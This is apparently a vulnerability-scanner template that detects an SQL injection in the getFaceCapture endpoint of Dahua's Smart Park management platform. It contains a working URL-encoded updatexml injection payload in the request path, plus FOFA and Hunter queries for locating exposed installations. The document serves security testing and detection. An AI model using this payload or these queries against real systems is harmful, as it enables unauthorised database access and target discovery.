id: Dahua

info:
  name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability
  author: Zero Trust Security Attack and Defense Laboratory
  severity: high
  description: |
    There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability
  metadata:
    fofa-query: app="dahua-智慧园区综合管理平台"
    hunter-query: web.body="/WPMS/asset/lib/json2.js"



http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c4ca"

      - type: status
        status:
          - 500
